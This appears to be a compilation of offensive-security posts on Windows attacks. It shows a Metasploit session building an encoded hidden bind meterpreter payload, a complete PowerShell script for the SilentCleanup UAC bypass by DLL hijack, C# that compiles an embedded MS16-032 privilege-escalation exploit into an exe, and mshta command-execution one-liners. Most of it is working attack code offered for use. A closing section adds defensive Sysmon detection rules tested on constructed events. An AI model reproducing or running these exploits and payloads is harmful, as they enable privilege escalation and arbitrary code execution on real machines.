Shellter Custom payload

msf > show payloads
msf > use windows/meterpreter/bind_hidden_ipknock_tcp
msf payload(bind_hidden_ipknock_tcp) > show options
 
Module options (payload/windows/meterpreter/bind_hidden_ipknock_tcp):
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique (Accepted: , , seh, thread, process, none)
KHOST                      yes       IP address allowed
LPORT     4444             yes       The listen port
RHOST                      no        The target address
msf payload(bind_hidden_ipknock_tcp) > set EXITFUNC thread
msf payload(bind_hidden_ipknock_tcp) > set KHOST 8.8.8.8
msf payload(bind_hidden_ipknock_tcp) > set LPORT 5555
msf payload(bind_hidden_ipknock_tcp) > generate -E -e x86/shikata_ga_nai -t raw -f custom_payload
[*] Writing 386 bytes to custom_payload...

BypassUac On Win10 Using Disk Cleanup

I recently saw a UAC bypass technique shared on enigma0x3's blog that abuses the Disk Cleanup scheduled task. I thought it was quite neat, so I'm sharing it here. The original post is here: (link)
There are already plenty of UAC bypass tools; one very good one is UACME.

Here is a brief explanation of how the Disk Cleanup UAC bypass works.

Windows 10 has a scheduled task named SilentCleanup, located at \Microsoft\Windows\DiskCleanup.

(figure 1.png: properties of the SilentCleanup scheduled task)

As the figure shows, this scheduled task runs its program with highest privileges, yet starting the task does not require highest privileges.

When the task runs it launches cleanmgr.exe, which creates a new folder C:\Users\<username>\AppData\Local\Temp\<GUID> and copies dismhost.exe and the DLLs it depends on into that folder.

(figure lala.png: the Temp\<GUID> folder containing dismhost.exe and its DLLs)

When dismhost.exe runs it loads those DLLs from its current directory, which sits under %TEMP% and is therefore writable by the unprivileged user, so it is fully open to DLL hijacking. Testing showed that LogProvider.dll is the last DLL loaded, which gives the widest window between cleanmgr.exe copying the file and dismhost.exe loading it, so that is the one to target: overwrite it with our malicious DLL before it is loaded, and our DLL runs in the task's high-integrity context, achieving the UAC bypass. To trigger the bypass immediately rather than waiting for the task's own schedule, the script below registers a WMI event subscription that fires when the GUID folder is created and then starts the task with schtasks /Run. The author has already published an exploit script (link: BypassUAC) and a test DLL (link: MessageBox).

Give it a try if you're interested~

The author's code is blocked here (GFW), so I've pasted it below:

function Invoke-UACBypass {
<#
.SYNOPSIS

Bypasses UAC on Windows 10 by abusing the SilentCleanup task to win a race condition, allowing for a DLL hijack without a privileged file copy.

Author: Matthew Graeber (@mattifestation), Matt Nelson (@enigma0x3)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None

.PARAMETER DllPath

Specifies the path to the DLL you want executed in a high integrity context. Be mindful of the architecture of the DLL. It must match that of %SystemRoot%\System32\Dism\LogProvider.dll.

.EXAMPLE

Invoke-UACBypass -DllPath C:\Users\TestUser\Desktop\Win10UACBypass\PrivescTest.dll

.EXAMPLE

Invoke-UACBypass -DllPath C:\Users\TestUser\Desktop\TotallyLegit.txt -Verbose

The DllPath can have any extension as long as the file itself is a DLL.
#>

    [CmdletBinding()]
    [OutputType([System.IO.FileInfo])]
    Param (
        [Parameter(Mandatory = $True)]
        [String]
        [ValidateScript({ Test-Path $_ })]
        $DllPath
    )

    $PrivescAction = {
        $ReplacementDllPath = $Event.MessageData.DllPath
        # The newly created GUID folder
        $DismHostFolder = $EventArgs.NewEvent.TargetInstance.Name
        
        $OriginalPreference = $VerbosePreference

        # Force -Verbose to display in the event
        if ($Event.MessageData.VerboseSet -eq $True) {
            $VerbosePreference = 'Continue'
        }

        Write-Verbose "DismHost folder created in $DismHostFolder"
        Write-Verbose "$ReplacementDllPath to $DismHostFolder\LogProvider.dll"
            
        try {
            $FileInfo = Copy-Item -Path $ReplacementDllPath -Destination "$DismHostFolder\LogProvider.dll" -Force -PassThru -ErrorAction Stop
        } catch {
            Write-Warning "Error copying file! Message: $_"
        }

        # Restore the event preference
        $VerbosePreference = $OriginalPreference

        if ($FileInfo) {
            # Trigger Wait-Event to return and indicate success.
            New-Event -SourceIdentifier 'DllPlantedSuccess' -MessageData $FileInfo
        }
    }

    $VerboseSet = $False
    if ($PSBoundParameters['Verbose']) { $VerboseSet = $True }

    $MessageData = New-Object -TypeName PSObject -Property @{
        DllPath = $DllPath
        VerboseSet = $VerboseSet # Pass the verbose preference to the scriptblock since
                                 # event scriptblocks will not automatically honor -Verbose.
    }

    $TempDrive = $Env:TEMP.Substring(0,2)

    # Trigger the DLL dropper with the following conditions:
    #  1) A directory is created - i.e. new Win32_Directory instance
    #  2) The directory created is created under %TEMP%
    #  3) The directory name is in the form of a GUID
    $TempFolderCreationEvent = "SELECT * FROM __InstanceCreationEvent WITHIN 1 WHERE TargetInstance ISA `"Win32_Directory`" AND TargetInstance.Drive = `"$TempDrive`" AND TargetInstance.Path = `"$($Env:TEMP.Substring(2).Replace('\', '\\'))\\`" AND TargetInstance.FileName LIKE `"________-____-____-____-____________`""
    
    $TempFolderWatcher = Register-WmiEvent -Query $TempFolderCreationEvent -Action $PrivescAction -MessageData $MessageData

    # We need to jump through these hoops to properly capture stdout and stderr of schtasks.
    $StartInfo = New-Object Diagnostics.ProcessStartInfo
    $StartInfo.FileName = 'schtasks'
    $StartInfo.Arguments = '/Run /TN "\Microsoft\Windows\DiskCleanup\SilentCleanup" /I'
    $StartInfo.RedirectStandardError = $True
    $StartInfo.RedirectStandardOutput = $True
    $StartInfo.UseShellExecute = $False
    $Process = New-Object Diagnostics.Process
    $Process.StartInfo = $StartInfo
    $null = $Process.Start()
    $Process.WaitForExit()
    $Stdout = $Process.StandardOutput.ReadToEnd().Trim()
    $Stderr = $Process.StandardError.ReadToEnd().Trim()

    if ($Stderr) {
        Unregister-Event -SubscriptionId $TempFolderWatcher.Id
        throw "SilentCleanup task failed to execute. Error message: $Stderr"
    } else {
        if ($Stdout.Contains('is currently running')) {
            Unregister-Event -SubscriptionId $TempFolderWatcher.Id
            Write-Warning 'SilentCleanup task is already running. Please wait until the task has completed.'
        }

        Write-Verbose "SilentCleanup task executed successfully. Message: $Stdout"
    }

    $PayloadExecutedEvent = Wait-Event -SourceIdentifier 'DllPlantedSuccess' -Timeout 10

    Unregister-Event -SubscriptionId $TempFolderWatcher.Id

    if ($PayloadExecutedEvent) {
        Write-Verbose 'UAC bypass was successful!'

        # Output the file info for the DLL that was planted
        $PayloadExecutedEvent.MessageData

        $PayloadExecutedEvent | Remove-Event
    } else {
        # The event timed out.
        Write-Error 'UAC bypass failed. The DLL was not planted in its target.'
    }
}

Compiling your PowerShell into an exe (MS16-032 as the example)

Teach a man to fish rather than give him a fish.

The earlier MS16-032 exploit was a PowerShell script; how do you turn it into an exe? It's simple: host it with .NET, make a small modification and compile. The modified code is here:

(link)

The gist seems to be blocked, so I'm pasting it here too:

/*
Author: Evilcg, Twitter: @Evilcg
Step One:
PS C:\> [psobject].Assembly.Location
C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
Step Two:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  /reference:"C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /out:MS16_032.exe MS16_032.cs
*/

// Windows 10 reference may be Here: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35
using System;
using System.IO;
using System.Collections.Generic;
using System.Collections.ObjectModel;
using System.Text;
using System.Threading.Tasks;
using System.Management.Automation;
using System.Management.Automation.Host;
using System.Management.Automation.Runspaces;

namespace ConsoleApplication1
{
    class Program
    {
        static string _application;
        static string _commandline;
        static int Main(string[] args)
        {
            if (args.Length == 0)
            {
                System.Console.WriteLine("Usage: MS16_032.exe calc.exe OR MS16_032.exe cmd.exe \"/c calc.exe\"");
                return 1;
            }
            else if (args.Length == 1)
            {
                // Single argument: the program to launch as SYSTEM
                _application = args[0];
                PowerShellExecutor t = new PowerShellExecutor();
                t.ExecuteSynchronously(_application, "");
            }
            else if (args.Length == 2)
            {
                // Two arguments: program plus its command line
                _application = args[0];
                _commandline = args[1];
                PowerShellExecutor t = new PowerShellExecutor();
                t.ExecuteSynchronously(_application, _commandline);
            }
            return 0;
            
        }
    }

    class PowerShellExecutor
    {
        public static string PSInvoke_MS16_032 = System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(@"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"));
        public void ExecuteSynchronously(string application, string commandline)
        {
            string Commandout;
            // Host PowerShell in-process through System.Management.Automation;
            // no powershell.exe is spawned.
            InitialSessionState iss = InitialSessionState.CreateDefault();
            Runspace rs = RunspaceFactory.CreateRunspace(iss);
            rs.Open();
            PowerShell ps = PowerShell.Create();
            ps.Runspace = rs;
            // Load the embedded Invoke-MS16-032 function, then call it.
            ps.AddScript(PSInvoke_MS16_032);
            if (commandline != "")
            {
                Commandout = "Invoke-MS16-032 -Application \"" + application + "\" -Commandline \"" + commandline + "\"";
            }
            else
            {
                Commandout = "Invoke-MS16-032 -Application " + application;
            }
            Console.WriteLine(Commandout);
            ps.AddScript(Commandout);
            ps.AddCommand("Out-Default");
            ps.Invoke();
            rs.Close();
        }
    }
}

The base64 content is the base64 encoding of the entire file https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1 (you can substitute your own PowerShell script). Because my modified version takes parameters, I wrote the simple C# program above, which runs the PowerShell through .NET.

Compiling requires System.Management.Automation.dll; the exact steps are in the comment at the top of the .cs file, so compile it yourselves. I only tested it on my own machine, nothing else. Test demo:

http://static.wooyun.org/upload/image/201606/2016063013052815262.gif

Running PowerShell through .NET does not require powershell.exe at all. For details see p0wnedShell or http://zone.wooyun.org/content/26831

The version compiled for .NET 2.0 is here (link)

Exec Commands Via Mshta.exe

While reading the analysis of the ransomware trojan written in "the world's best programming language", I noticed the attacker used mshta to execute commands. I hadn't worked with it before, and there isn't much material on it. mshta is meant to run .hta files, but testing showed that commands can be executed through mshta without any .hta file at all, and after a few more tests I found it accepts not only VBScript but also JavaScript. The payloads are collected below:

VBSCRIPT EXEC

mshta vbscript:CreateObject("Wscript.Shell").Run("calc.exe",0,true)(window.close)

JAVASCRIPT EXEC

mshta javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im mshta.exe",0,true);}
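As an added example (my code, not the original post's or the tool authors'), here is detection logic for both the SilentCleanup DLL hijack described above and the inline mshta one-liners, run over constructed Sysmon-style events. It assumes events have already been parsed into dicts keyed by Sysmon field names (EventID, Image, TargetFilename, ImageLoaded, Signed, Signature, CommandLine); the sample events are constructed, not captured from a real host. Two indicators cover the bypass: something other than cleanmgr.exe writing LogProvider.dll into the %TEMP%\<GUID> folder (the plant), and dismhost.exe loading a LogProvider.dll from that folder that is not Microsoft-signed (the hijack). For mshta the indicator is a command line carrying vbscript: or javascript: instead of an .hta path, which both payloads above leave in process-creation logs.

```python
"""Added detection example for the SilentCleanup DLL hijack and inline mshta
payloads, over constructed Sysmon-style events (not real logs)."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Folder cleanmgr.exe creates: %TEMP%\<GUID>\ (paths are lower-cased before matching)
_GUID = r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}"
TEMP_GUID_LOGPROVIDER = re.compile(
    r"\\appdata\\local\\temp\\" + _GUID + r"\\logprovider\.dll$")

# mshta launched with an inline script protocol instead of an .hta file
MSHTA_INLINE = re.compile(r"\b(?:vbscript|javascript):", re.IGNORECASE)


@dataclass
class Alert:
    rule: str
    detail: str


def check_event(ev: Dict[str, object]) -> Optional[Alert]:
    """Return an Alert for one event, or None if it looks benign."""
    eid = ev["EventID"]
    image = str(ev.get("Image", "")).lower()

    if eid == 11:  # Sysmon FileCreate
        # Only cleanmgr.exe should write LogProvider.dll into the GUID folder;
        # any other writer is the DLL plant.
        target = str(ev.get("TargetFilename", ""))
        if TEMP_GUID_LOGPROVIDER.search(target.lower()) and not image.endswith("\\cleanmgr.exe"):
            return Alert("silentcleanup_dll_plant", f"{ev.get('Image')} wrote {target}")

    elif eid == 7:  # Sysmon ImageLoad
        # dismhost.exe legitimately loads LogProvider.dll from the GUID folder,
        # but the genuine copy is Microsoft-signed; a hijack DLL is not.
        loaded = str(ev.get("ImageLoaded", ""))
        ms_signed = (str(ev.get("Signed", "")).lower() == "true"
                     and ev.get("Signature") == "Microsoft Windows")
        if (image.endswith("\\dismhost.exe")
                and TEMP_GUID_LOGPROVIDER.search(loaded.lower())
                and not ms_signed):
            return Alert("silentcleanup_dll_hijack", f"dismhost.exe loaded unsigned {loaded}")

    elif eid == 1:  # Sysmon ProcessCreate
        cmd = str(ev.get("CommandLine", ""))
        if image.endswith("\\mshta.exe") and MSHTA_INLINE.search(cmd):
            return Alert("mshta_inline_script", cmd)

    return None


def scan(events: List[Dict[str, object]]) -> List[Alert]:
    """Run check_event over a batch and keep the hits, in event order."""
    return [a for a in (check_event(e) for e in events) if a is not None]


# Constructed sample events (not real logs), in the order they would appear
# during the bypass and the mshta one-liner. Hypothetical user and GUID.
_GUID_DIR = r"C:\Users\bob\AppData\Local\Temp\8A3B1C2D-4E5F-4A6B-8C7D-9E0F1A2B3C4D"
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"EventID": 11, "Image": r"C:\Windows\System32\cleanmgr.exe",
     "TargetFilename": _GUID_DIR + r"\LogProvider.dll"},                    # benign copy
    {"EventID": 11, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetFilename": _GUID_DIR + r"\LogProvider.dll"},                    # the plant
    {"EventID": 7, "Image": _GUID_DIR + r"\DismHost.exe",
     "ImageLoaded": _GUID_DIR + r"\LogProvider.dll", "Signed": "false"},    # the hijack
    {"EventID": 7, "Image": _GUID_DIR + r"\DismHost.exe",
     "ImageLoaded": _GUID_DIR + r"\LogProvider.dll",
     "Signed": "true", "Signature": "Microsoft Windows"},                   # genuine DLL
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": 'mshta vbscript:CreateObject("Wscript.Shell").Run("calc.exe",0,true)(window.close)'},
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe C:\Users\bob\Desktop\report.hta"},          # ordinary .hta
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(f"[{alert.rule}] {alert.detail}")
```

Sysmon only records ImageLoad (event 7) for images or modules that its configuration selects, so the hijack rule needs a config entry covering dismhost.exe or LogProvider.dll; the FileCreate rule fires earlier in the sequence and does not depend on that. The mshta rule is intentionally narrow: it flags only the inline-protocol form shown on this page, not every mshta launch.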
